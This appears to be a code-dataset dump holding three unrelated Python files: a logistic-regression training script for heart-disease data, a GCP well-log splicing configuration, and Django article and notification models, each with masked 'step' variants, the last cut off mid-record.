from sklearn.model_selection import cross_validate
# read the csv file
dataset = pd.read_csv('heart.csv')
#copy the dataset
df = dataset.copy()
# make X and Y
X = df.drop(['target'], axis=1).values
Y = df.target.values
# correleation matrix
corr_mat = df.corr()
# split based on training and test dataset
x_train, x_test, y_train, y_test = \
train_test_split(X,Y,test_size =0.3,random_state=1234,stratify=Y)
# Logistic regression
lr = LogisticRegression()
lr.fit(x_train, y_train)
y_predict = lr.predict(x_test)
train_score = lr.score(x_train, y_train)
test_score = lr.score(x_test, y_test)
# accuracy score
acc_score = accuracy_score(y_test, y_predict)
rmse = math.sqrt(mean_squared_error(y_test, y_predict))
# Cross validation
lr_cross = LogisticRegression()
cv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)
test_cv_avg = np.average(cv_results_lr['test_score'])
train_cv_avg = np.average(cv_results_lr['train_score'])
pickle.dump(lr, open('model.pkl','wb'))
|
normal
|
{
"blob_id": "1508697f93114d7f20182a3e9c1df5617904529a",
"index": 8725,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nlr.fit(x_train, y_train)\n<mask token>\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-3": "<mask token>\ndataset = pd.read_csv('heart.csv')\ndf = dataset.copy()\nX = df.drop(['target'], axis=1).values\nY = df.target.values\ncorr_mat = df.corr()\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.3,\n random_state=1234, stratify=Y)\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\ny_predict = lr.predict(x_test)\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\nacc_score = accuracy_score(y_test, y_predict)\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\nlr_cross = LogisticRegression()\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport warnings\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import mean_squared_error\nimport math\nfrom sklearn.model_selection import cross_validate\ndataset = pd.read_csv('heart.csv')\ndf = dataset.copy()\nX = df.drop(['target'], axis=1).values\nY = df.target.values\ncorr_mat = df.corr()\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.3,\n random_state=1234, stratify=Y)\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\ny_predict = lr.predict(x_test)\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\nacc_score = accuracy_score(y_test, y_predict)\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\nlr_cross = LogisticRegression()\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-5": "# import libraries\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport warnings\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import mean_squared_error\nimport math\nfrom sklearn.model_selection import cross_validate\n\n\n# read the csv file\ndataset = pd.read_csv('heart.csv')\n\n#copy the dataset\ndf = dataset.copy()\n\n# make X and Y\nX = df.drop(['target'], axis=1).values\nY = df.target.values\n\n\n# correleation matrix\ncorr_mat = df.corr()\n\n\n# split based on training and test dataset\n\nx_train, x_test, y_train, y_test = \\\n train_test_split(X,Y,test_size =0.3,random_state=1234,stratify=Y)\n \n\n# Logistic regression\n\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\n\ny_predict = lr.predict(x_test)\n\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\n\n\n# accuracy score\n\nacc_score = accuracy_score(y_test, y_predict)\n\n\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\n\n\n# Cross validation\n\nlr_cross = LogisticRegression()\n\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\n\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\n\npickle.dump(lr, open('model.pkl','wb'))\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
PROJECT_ID = "aaet-geoscience-dev"
# The tmp folder is for lasio I/O purposes
DATA_PATH = "/home/airflow/gcs/data/tmp"
# Credential JSON key for accessing other projects
# CREDENTIALS_JSON = "gs://aaet_zexuan/flow/keys/composer_las_merge.json"
CREDENTIALS_JSON = "keys/composer_las_merge.json"
# Bucket name for merged las files and spliced las files
BUCKET_LAS_MERGE = "las_merged"
BUCKET_LAS_SPLICE = "us-central1-lithos-dev-94beb3d4-bucket"
# las_splice.py output to the composer data folder, as input of logqc
COMPOSER_FOLDER = "data/logqc_landing"
TMP_FOLDER = "data/tmp"
# for GCP web UI and Big Query Job Status Report
BUCKET_JOB = "log_splice_tool_jobs"
BIGQUERY_DATASET_ID = "urc_jobs"
BIGQUERY_TABLE_ID = "jobs"
# Workflow type
tpt_workflow_type = "tpt"
logsplice_workflow_type = "logsplice"
logqc_workflow_type = "logqc"
geomech_workflow_type = "geomech"
# Number of processors for las_merge_MP (multiprocessing).
N_PROCESSORS = 16
# The window size for moving average, e.g. 11 means the window covers a
# point and 5 adjacent points on both sides
MOVING_AVG_WINDOW_SIZE = 11
# Default value for missing data, usually it is either -999.25 or -999.0
MISSING = -999.0
# COL_DICT: a dictionary of aliased curve names for log splicing. keys correspond to measurements
# (e.g., 'density', 'gamma', 'resistivity', etc.),
# and each value is a list of aliased column names that could potentially correspond
# to those measurements. Each key is the aliased curve name before splicing,
# each key's value is the standard curve name after splicing.
COL_DICT = {
# Caliper
"cal": ["CAL", "CALI", "CALX", "HCAL", "TGS_CALX", "RAW_CALX"],
# Compressional Sonic Slowness
"dtc": ["DT", "DT24", "DTC", 'TGS_DT', "TGS_DTC", "RAW_DT", "RAW_DTC"],
# Deep Resistivity
# 'rdeep' includes 'rdeep_ltrl' (laterolog), 'rdeep_indct' (induction), 'rdeep_unknown'.
# A final 'rdeep' will be generated
# with an additional 'rdeep_type' curve to denote the log type.
"rdeep": ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90', 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'],
# Density (Bulk)
"rhob": ["DEN", "RHOB", "RHOZ", "ZDEN", "ZDNC", "TGS_RHOB", 'RAW_RHOB'],
# Density (Correction)
"drho": ["DRHO", "HDRA", "ZCOR"],
# Gamma Ray
"gr": ["APC_GR_NRM", "GAMM", "GR", "GR_R", "GRR", 'SGR', 'SGRR', 'CGR'],
# Neutron Porosity
"nphil": ["CNCF", "NEU", "NPOR", "NPHI", "NPHIL", "TNPH", 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'],
# Photoelectric effect
"pe": ["PE", "PEF", "PEFZ", 'TGS_PE', 'RAW_PE'],
}
# LDD is laterolog
# The rest are inductions
# RDEEP, RES, RES_DEEP are of unknown origin
# __log_type_rdeep = [log_type_enum.induction, #AHT90
# log_type_enum.induction, #AT90
# log_type_enum.induction, #ILD
# log_type_enum.induction, #ILT90
# log_type_enum.laterolog, #LLD
# log_type_enum.induction, #M2R9
# log_type_enum.unknown, #RDEEP
# log_type_enum.unknown, #RES
# log_type_enum.unknown] #RES_DEEP
RDEEP_TYPE_LIST = ["rdeep_ltrl", "rdeep_indct", "rdeep_unknown"]
RDEEP_TYPE_DICT = {"rdeep_ltrl": 1, "rdeep_indct": 2, "rdeep_unknown": 3}
# curve description dictionary
CURVE_DESC = {
"DEPT": "Depth",
"CAL": "Caliper",
"DRHO": "Density Correction",
"DTC": "Compressional Wave Slowness",
"DTS": "Shear Wave Slowness",
"GR": "Gamma Ray",
"NPHI": "Neutron Porosity",
"NPHIL": "Neutron Porosity",
"PE": "Photoelectric Effect",
"RDEEP": "Deep Resistivity",
"RDEEP_LTRL": "Laterolog Resistivity",
"RDEEP_INDCT": "Induction Resistivity",
"RDEEP_UNKNOWN": "Unknown Resistivity (Laterolog or Induction)",
"RDEEP_TYPE": "RDEEP Type 1:Laterolog 2:Induction 3:Unknown",
"RHOB": "Bulk Density",
"RUGOSITY": "Borehole Rugosity",
"RUGOSITY_BHF": "Rugosity Bad Hole Flag",
"DRHO_BHF": "Density Correction Bad Hole Flag",
"DTC_BHF": "Sonic Bad Hole Flag",
"GR_BHF": "Gamma Ray Bad Hole Flag",
"NPHIL_BHF": "Neutron Bad Hole Flag",
"RHOB_BHF": "Density Bad Hole Flag",
"LOG_RDEEP_BHF": "Resistivity Bad Hole Flag",
"PE_BHF": "PE Bad Hole Flag",
"RHOB_MCF": "Density Corrected from Multiwell Flag",
"RHOB_SYN": "Density Estimation from Ensemble of Learners",
"NPHI_MCF": "Neutron Corrected from Multiwell Flag",
"NPHI_SYN": "Neutron Estimation from Ensemble of Learners",
"DTC_MCF": "Sonic Corrected from Multiwell Flag",
"DTC_SYN": "Sonic Estimation from Ensemble of Learners",
"PE_MCF": "PE Corrected from Multiwell Flag",
"PE_SYN": "PE Estimation from Ensemble of Learners",
"RHOB_NCF": "Density No Correction Flag",
"RHOB_CORR": "Density Corrected",
"NPHI_NCF": "Neutron No Correction Flag",
"NPHI_CORR": "Neutron Corrected",
"DTC_NCF": "Sonic No Correction Flag",
"DTC_CORR": "Sonic Corrected",
"PE_NCF": "PE No Correction Flag",
"PE_CORR": "PE Corrected"
}
|
normal
|
{
"blob_id": "0b2a036b806cca6e7f58008040b3a261a8bc844d",
"index": 4092,
"step-1": "<mask token>\n",
"step-2": "PROJECT_ID = 'aaet-geoscience-dev'\nDATA_PATH = '/home/airflow/gcs/data/tmp'\nCREDENTIALS_JSON = 'keys/composer_las_merge.json'\nBUCKET_LAS_MERGE = 'las_merged'\nBUCKET_LAS_SPLICE = 'us-central1-lithos-dev-94beb3d4-bucket'\nCOMPOSER_FOLDER = 'data/logqc_landing'\nTMP_FOLDER = 'data/tmp'\nBUCKET_JOB = 'log_splice_tool_jobs'\nBIGQUERY_DATASET_ID = 'urc_jobs'\nBIGQUERY_TABLE_ID = 'jobs'\ntpt_workflow_type = 'tpt'\nlogsplice_workflow_type = 'logsplice'\nlogqc_workflow_type = 'logqc'\ngeomech_workflow_type = 'geomech'\nN_PROCESSORS = 16\nMOVING_AVG_WINDOW_SIZE = 11\nMISSING = -999.0\nCOL_DICT = {'cal': ['CAL', 'CALI', 'CALX', 'HCAL', 'TGS_CALX', 'RAW_CALX'],\n 'dtc': ['DT', 'DT24', 'DTC', 'TGS_DT', 'TGS_DTC', 'RAW_DT', 'RAW_DTC'],\n 'rdeep': ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90',\n 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'], 'rhob': ['DEN',\n 'RHOB', 'RHOZ', 'ZDEN', 'ZDNC', 'TGS_RHOB', 'RAW_RHOB'], 'drho': [\n 'DRHO', 'HDRA', 'ZCOR'], 'gr': ['APC_GR_NRM', 'GAMM', 'GR', 'GR_R',\n 'GRR', 'SGR', 'SGRR', 'CGR'], 'nphil': ['CNCF', 'NEU', 'NPOR', 'NPHI',\n 'NPHIL', 'TNPH', 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'], 'pe': [\n 'PE', 'PEF', 'PEFZ', 'TGS_PE', 'RAW_PE']}\nRDEEP_TYPE_LIST = ['rdeep_ltrl', 'rdeep_indct', 'rdeep_unknown']\nRDEEP_TYPE_DICT = {'rdeep_ltrl': 1, 'rdeep_indct': 2, 'rdeep_unknown': 3}\nCURVE_DESC = {'DEPT': 'Depth', 'CAL': 'Caliper', 'DRHO':\n 'Density Correction', 'DTC': 'Compressional Wave Slowness', 'DTS':\n 'Shear Wave Slowness', 'GR': 'Gamma Ray', 'NPHI': 'Neutron Porosity',\n 'NPHIL': 'Neutron Porosity', 'PE': 'Photoelectric Effect', 'RDEEP':\n 'Deep Resistivity', 'RDEEP_LTRL': 'Laterolog Resistivity',\n 'RDEEP_INDCT': 'Induction Resistivity', 'RDEEP_UNKNOWN':\n 'Unknown Resistivity (Laterolog or Induction)', 'RDEEP_TYPE':\n 'RDEEP Type 1:Laterolog 2:Induction 3:Unknown', 'RHOB': 'Bulk Density',\n 'RUGOSITY': 'Borehole Rugosity', 'RUGOSITY_BHF':\n 'Rugosity Bad Hole Flag', 'DRHO_BHF':\n 'Density Correction Bad Hole Flag', 'DTC_BHF': 'Sonic Bad Hole Flag',\n 'GR_BHF': 'Gamma Ray Bad Hole Flag', 'NPHIL_BHF':\n 'Neutron Bad Hole Flag', 'RHOB_BHF': 'Density Bad Hole Flag',\n 'LOG_RDEEP_BHF': 'Resistivity Bad Hole Flag', 'PE_BHF':\n 'PE Bad Hole Flag', 'RHOB_MCF': 'Density Corrected from Multiwell Flag',\n 'RHOB_SYN': 'Density Estimation from Ensemble of Learners', 'NPHI_MCF':\n 'Neutron Corrected from Multiwell Flag', 'NPHI_SYN':\n 'Neutron Estimation from Ensemble of Learners', 'DTC_MCF':\n 'Sonic Corrected from Multiwell Flag', 'DTC_SYN':\n 'Sonic Estimation from Ensemble of Learners', 'PE_MCF':\n 'PE Corrected from Multiwell Flag', 'PE_SYN':\n 'PE Estimation from Ensemble of Learners', 'RHOB_NCF':\n 'Density No Correction Flag', 'RHOB_CORR': 'Density Corrected',\n 'NPHI_NCF': 'Neutron No Correction Flag', 'NPHI_CORR':\n 'Neutron Corrected', 'DTC_NCF': 'Sonic No Correction Flag', 'DTC_CORR':\n 'Sonic Corrected', 'PE_NCF': 'PE No Correction Flag', 'PE_CORR':\n 'PE Corrected'}\n",
"step-3": "PROJECT_ID = \"aaet-geoscience-dev\"\r\n# The tmp folder is for lasio I/O purposes\r\nDATA_PATH = \"/home/airflow/gcs/data/tmp\"\r\n\r\n# Credential JSON key for accessing other projects\r\n# CREDENTIALS_JSON = \"gs://aaet_zexuan/flow/keys/composer_las_merge.json\"\r\nCREDENTIALS_JSON = \"keys/composer_las_merge.json\"\r\n\r\n# Bucket name for merged las files and spliced las files\r\nBUCKET_LAS_MERGE = \"las_merged\"\r\nBUCKET_LAS_SPLICE = \"us-central1-lithos-dev-94beb3d4-bucket\"\r\n\r\n# las_splice.py output to the composer data folder, as input of logqc\r\nCOMPOSER_FOLDER = \"data/logqc_landing\"\r\nTMP_FOLDER = \"data/tmp\"\r\n# for GCP web UI and Big Query Job Status Report\r\nBUCKET_JOB = \"log_splice_tool_jobs\"\r\nBIGQUERY_DATASET_ID = \"urc_jobs\"\r\nBIGQUERY_TABLE_ID = \"jobs\"\r\n\r\n# Workflow type\r\ntpt_workflow_type = \"tpt\"\r\nlogsplice_workflow_type = \"logsplice\"\r\nlogqc_workflow_type = \"logqc\"\r\ngeomech_workflow_type = \"geomech\"\r\n\r\n# Number of processors for las_merge_MP (multiprocessing).\r\nN_PROCESSORS = 16\r\n\r\n# The window size for moving average, e.g. 11 means the window covers a\r\n# point and 5 adjacent points on both sides\r\nMOVING_AVG_WINDOW_SIZE = 11\r\n\r\n# Default value for missing data, usually it is either -999.25 or -999.0\r\nMISSING = -999.0\r\n\r\n# COL_DICT: a dictionary of aliased curve names for log splicing. keys correspond to measurements\r\n# (e.g., 'density', 'gamma', 'resistivity', etc.),\r\n# and each value is a list of aliased column names that could potentially correspond\r\n# to those measurements. Each key is the aliased curve name before splicing,\r\n# each key's value is the standard curve name after splicing.\r\nCOL_DICT = {\r\n # Caliper\r\n \"cal\": [\"CAL\", \"CALI\", \"CALX\", \"HCAL\", \"TGS_CALX\", \"RAW_CALX\"],\r\n # Compressional Sonic Slowness\r\n \"dtc\": [\"DT\", \"DT24\", \"DTC\", 'TGS_DT', \"TGS_DTC\", \"RAW_DT\", \"RAW_DTC\"],\r\n # Deep Resistivity\r\n # 'rdeep' includes 'rdeep_ltrl' (laterolog), 'rdeep_indct' (induction), 'rdeep_unknown'.\r\n # A final 'rdeep' will be generated\r\n # with an additional 'rdeep_type' curve to denote the log type.\r\n \"rdeep\": ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90', 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'],\r\n # Density (Bulk)\r\n \"rhob\": [\"DEN\", \"RHOB\", \"RHOZ\", \"ZDEN\", \"ZDNC\", \"TGS_RHOB\", 'RAW_RHOB'],\r\n # Density (Correction)\r\n \"drho\": [\"DRHO\", \"HDRA\", \"ZCOR\"],\r\n # Gamma Ray\r\n \"gr\": [\"APC_GR_NRM\", \"GAMM\", \"GR\", \"GR_R\", \"GRR\", 'SGR', 'SGRR', 'CGR'],\r\n # Neutron Porosity\r\n \"nphil\": [\"CNCF\", \"NEU\", \"NPOR\", \"NPHI\", \"NPHIL\", \"TNPH\", 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'],\r\n # Photoelectric effect\r\n \"pe\": [\"PE\", \"PEF\", \"PEFZ\", 'TGS_PE', 'RAW_PE'],\r\n}\r\n\r\n# LDD is laterolog\r\n# The rest are inductions\r\n# RDEEP, RES, RES_DEEP are of unknown origin\r\n# __log_type_rdeep = [log_type_enum.induction, #AHT90\r\n# log_type_enum.induction, #AT90\r\n# log_type_enum.induction, #ILD\r\n# log_type_enum.induction, #ILT90\r\n# log_type_enum.laterolog, #LLD\r\n# log_type_enum.induction, #M2R9\r\n# log_type_enum.unknown, #RDEEP\r\n# log_type_enum.unknown, #RES\r\n# log_type_enum.unknown] #RES_DEEP\r\n\r\nRDEEP_TYPE_LIST = [\"rdeep_ltrl\", \"rdeep_indct\", \"rdeep_unknown\"]\r\nRDEEP_TYPE_DICT = {\"rdeep_ltrl\": 1, \"rdeep_indct\": 2, \"rdeep_unknown\": 3}\r\n\r\n# curve description dictionary\r\nCURVE_DESC = {\r\n \"DEPT\": \"Depth\",\r\n \"CAL\": \"Caliper\",\r\n \"DRHO\": \"Density Correction\",\r\n \"DTC\": \"Compressional Wave Slowness\",\r\n \"DTS\": \"Shear Wave Slowness\",\r\n \"GR\": \"Gamma Ray\",\r\n \"NPHI\": \"Neutron Porosity\",\r\n \"NPHIL\": \"Neutron Porosity\",\r\n \"PE\": \"Photoelectric Effect\",\r\n \"RDEEP\": \"Deep Resistivity\",\r\n \"RDEEP_LTRL\": \"Laterolog Resistivity\",\r\n \"RDEEP_INDCT\": \"Induction Resistivity\",\r\n \"RDEEP_UNKNOWN\": \"Unknown Resistivity (Laterolog or Induction)\",\r\n \"RDEEP_TYPE\": \"RDEEP Type 1:Laterolog 2:Induction 3:Unknown\",\r\n \"RHOB\": \"Bulk Density\",\r\n \"RUGOSITY\": \"Borehole Rugosity\",\r\n \"RUGOSITY_BHF\": \"Rugosity Bad Hole Flag\",\r\n \"DRHO_BHF\": \"Density Correction Bad Hole Flag\",\r\n \"DTC_BHF\": \"Sonic Bad Hole Flag\",\r\n \"GR_BHF\": \"Gamma Ray Bad Hole Flag\",\r\n \"NPHIL_BHF\": \"Neutron Bad Hole Flag\",\r\n \"RHOB_BHF\": \"Density Bad Hole Flag\",\r\n \"LOG_RDEEP_BHF\": \"Resistivity Bad Hole Flag\",\r\n \"PE_BHF\": \"PE Bad Hole Flag\",\r\n \"RHOB_MCF\": \"Density Corrected from Multiwell Flag\",\r\n \"RHOB_SYN\": \"Density Estimation from Ensemble of Learners\",\r\n \"NPHI_MCF\": \"Neutron Corrected from Multiwell Flag\",\r\n \"NPHI_SYN\": \"Neutron Estimation from Ensemble of Learners\",\r\n \"DTC_MCF\": \"Sonic Corrected from Multiwell Flag\",\r\n \"DTC_SYN\": \"Sonic Estimation from Ensemble of Learners\",\r\n \"PE_MCF\": \"PE Corrected from Multiwell Flag\",\r\n \"PE_SYN\": \"PE Estimation from Ensemble of Learners\",\r\n \"RHOB_NCF\": \"Density No Correction Flag\",\r\n \"RHOB_CORR\": \"Density Corrected\",\r\n \"NPHI_NCF\": \"Neutron No Correction Flag\",\r\n \"NPHI_CORR\": \"Neutron Corrected\",\r\n \"DTC_NCF\": \"Sonic No Correction Flag\",\r\n \"DTC_CORR\": \"Sonic Corrected\",\r\n \"PE_NCF\": \"PE No Correction Flag\",\r\n \"PE_CORR\": \"PE Corrected\"\r\n}\r\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django.contrib.auth import get_user_model
from django.db import models
from django.db.models.signals import post_save
from apps.common.constants import NOTIFICATION_TYPE_CHOICES, INFO
from apps.core.models import BaseModel
from apps.core.utils.helpers import get_upload_path
from apps.core.utils.push_notification import send_push_message
User = get_user_model()
class City(BaseModel):
name = models.CharField(max_length=255, db_index=True)
def __str__(self):
return self.name
class Article(BaseModel):
created_by = models.ForeignKey(User, related_name='articles', on_delete=models.SET_NULL, null=True)
title = models.CharField(max_length=200)
description = models.TextField()
# Below fields are optional
image = models.ImageField(
upload_to=get_upload_path,
blank=True
)
is_archived = models.BooleanField(default=False)
def __str__(self):
return self.title
class UserNotification(BaseModel):
title = models.CharField(max_length=150)
sent_by = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True, related_name='sent_notifications')
sent_to = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True, related_name='notifications')
content = models.TextField(blank=True)
is_read = models.BooleanField(default=False) # To mark notification as read
notification_type = models.CharField(
max_length=15,
choices=NOTIFICATION_TYPE_CHOICES,
default=INFO
)
def __str__(self):
if self.sent_by:
return f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'
return f'{str(self.sent_to)} content {self.content}'
class Meta:
ordering = ('is_read', '-created_at')
def send_push_notification(sender, instance, created, **kwargs):
if created:
receiver = instance.sent_to
receiver_device = receiver.devices.filter(is_active=True).first()
if receiver_device:
send_push_message(
receiver_device.registration_id,
title=instance.title,
body=instance.content
)
def send_article_notifications(sender, instance, created, **kwargs):
if created:
UserNotification.objects.bulk_create([
UserNotification(**{
'title': instance.title,
'sent_to': user,
'notification_type': INFO,
'content': instance.description
}) for user in User.objects.all()
])
post_save.connect(send_push_notification, sender=UserNotification)
post_save.connect(send_article_notifications, sender=Article)
|
normal
|
{
"blob_id": "c2260278c8dfb353f55ee9ea3495049b08169447",
"index": 4115,
"step-1": "<mask token>\n\n\nclass City(BaseModel):\n name = models.CharField(max_length=255, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n created_by = models.ForeignKey(User, related_name='articles', on_delete\n =models.SET_NULL, null=True)\n title = models.CharField(max_length=200)\n description = models.TextField()\n image = models.ImageField(upload_to=get_upload_path, blank=True)\n is_archived = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title\n\n\nclass UserNotification(BaseModel):\n title = models.CharField(max_length=150)\n sent_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='sent_notifications')\n sent_to = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='notifications')\n content = models.TextField(blank=True)\n is_read = models.BooleanField(default=False)\n notification_type = models.CharField(max_length=15, choices=\n NOTIFICATION_TYPE_CHOICES, default=INFO)\n\n def __str__(self):\n if self.sent_by:\n return (\n f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'\n )\n return f'{str(self.sent_to)} content {self.content}'\n\n\n class Meta:\n ordering = 'is_read', '-created_at'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass City(BaseModel):\n name = models.CharField(max_length=255, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n created_by = models.ForeignKey(User, related_name='articles', on_delete\n =models.SET_NULL, null=True)\n title = models.CharField(max_length=200)\n description = models.TextField()\n image = models.ImageField(upload_to=get_upload_path, blank=True)\n is_archived = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title\n\n\nclass UserNotification(BaseModel):\n title = models.CharField(max_length=150)\n sent_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='sent_notifications')\n sent_to = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='notifications')\n content = models.TextField(blank=True)\n is_read = models.BooleanField(default=False)\n notification_type = models.CharField(max_length=15, choices=\n NOTIFICATION_TYPE_CHOICES, default=INFO)\n\n def __str__(self):\n if self.sent_by:\n return (\n f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'\n )\n return f'{str(self.sent_to)} content {self.content}'\n\n\n class Meta:\n ordering = 'is_read', '-created_at'\n\n\n<mask token>\n\n\ndef send_article_notifications(sender, instance, created, **kwargs):\n if created:\n UserNotification.objects.bulk_create([UserNotification(**{'title':\n instance.title, 'sent_to': user, 'notification_type': INFO,\n 'content': instance.description}) for user in User.objects.all()])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass City(BaseModel):\n name = models.CharField(max_length=255, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n created_by = models.ForeignKey(User, related_name='articles', on_delete\n =models.SET_NULL, null=True)\n title = models.CharField(max_length=200)\n description = models.TextField()\n image = models.ImageField(upload_to=get_upload_path, blank=True)\n is_archived = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title\n\n\nclass UserNotification(BaseModel):\n title = models.CharField(max_length=150)\n sent_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='sent_notifications')\n sent_to = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='notifications')\n content = models.TextField(blank=True)\n is_read = models.BooleanField(default=False)\n notification_type = models.CharField(max_length=15, choices=\n NOTIFICATION_TYPE_CHOICES, default=INFO)\n\n def __str__(self):\n if self.sent_by:\n return (\n f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'\n )\n return f'{str(self.sent_to)} content {self.content}'\n\n\n class Meta:\n ordering = 'is_read', '-created_at'\n\n\ndef send_push_notification(sender, instance, created, **kwargs):\n if created:\n receiver = instance.sent_to\n receiver_device = receiver.devices.filter(is_active=True).first()\n if receiver_device:\n send_push_message(receiver_device.registration_id, title=\n instance.title, body=instance.content)\n\n\ndef send_article_notifications(sender, instance, created, **kwargs):\n if created:\n UserNotification.objects.bulk_create([UserNotification(**{'title':\n instance.title, 'sent_to': user, 'notification_type': INFO,\n 'content': instance.description}) for user in User.objects.all()])\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass City(BaseModel):\n name = models.CharField(max_length=255, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n created_by = models.ForeignKey(User, related_name='articles', on_delete\n =models.SET_NULL, null=True)\n title = models.CharField(max_length=200)\n description = models.TextField()\n image = models.ImageField(upload_to=get_upload_path, blank=True)\n is_archived = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title\n\n\nclass UserNotification(BaseModel):\n title = models.CharField(max_length=150)\n sent_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='sent_notifications')\n sent_to = models.ForeignKey(User, on_delete=models.SET_NULL, null=True,\n related_name='notifications')\n content = models.TextField(blank=True)\n is_read = models.BooleanField(default=False)\n notification_type = models.CharField(max_length=15, choices=\n NOTIFICATION_TYPE_CHOICES, default=INFO)\n\n def __str__(self):\n if self.sent_by:\n return (\n f'Sent by {str(self.sent_by)} to {str(self.sent_to)} content {self.content}'\n )\n return f'{str(self.sent_to)} content {self.content}'\n\n\n class Meta:\n ordering = 'is_read', '-created_at'\n\n\ndef send_push_notification(sender, instance, created, **kwargs):\n if created:\n receiver = instance.sent_to\n receiver_device = receiver.devices.filter(is_active=True).first()\n if receiver_device:\n send_push_message(receiver_device.registration_id, title=\n instance.title, body=instance.content)\n\n\ndef send_article_notifications(sender, instance, created, **kwargs):\n if created:\n UserNotification.objects.bulk_create([UserNotification(**{'title':\n instance.title, 'sent_to': user, 'notification_type': INFO,\n 'content': instance.description}) for user in User.objects.all()])\n\n\npost_save.connect(send_push_notification, sender=UserNotification)\npost_save.connect(send_article_notifications, sender=Article)\n",
"step-5": "from django.contrib.auth import get_user_model\nfrom django.db import models\nfrom django.db.models.signals import post_save\n\nfrom apps.common.constants import NOTIFICATION_TYPE_CHOICES, INFO\nfrom apps.core.models import BaseModel\nfrom apps.core.utils.helpers import get_upload_path\nfrom apps.core.utils.push_notification import send_push_message\n\nUser = get_user_model()\n\n\nclass City(BaseModel):\n name = models.CharField(max_length=255, db_index=True)\n\n def __str__(self):\n return self.name\n\n\nclass Article(BaseModel):\n created_by = models.ForeignKey(User, related_name='articles', on_delete=models.SET_NULL, null=True)\n title = models.CharField(max_length=200)\n description = models.TextField()\n # Below fields are optional\n image = models.ImageField(\n upload_to=get_upload_path,\n blank=True\n )\n is_archived = models.BooleanField(default=False)\n\n def __str__(self):\n return self.title\n\n\nclass UserNotification(BaseModel):\n title = models.CharField(max_length=150)\n sent_by = models.ForeignKey(\n User, on_delete=models.SET_NULL, null=True, related_name='sent_notifications')\n sent_to = models.ForeignKey(\n User, on_delete=models.SET_NULL, null=True, related_name='notifications')\n content = models.TextField(blank=True)\n is_read = models.BooleanField(default=False) # To mark notification as read\n notification_type = models.CharField(\n max_length=15,\n choices=NOTIFICATION_TYPE_CHOICES,\n default=INFO\n )\n\n def __str__(self):\n if self.sent_by:\n return f'Sent by {str(self.sent_by)} to {str(self.sent_to)} 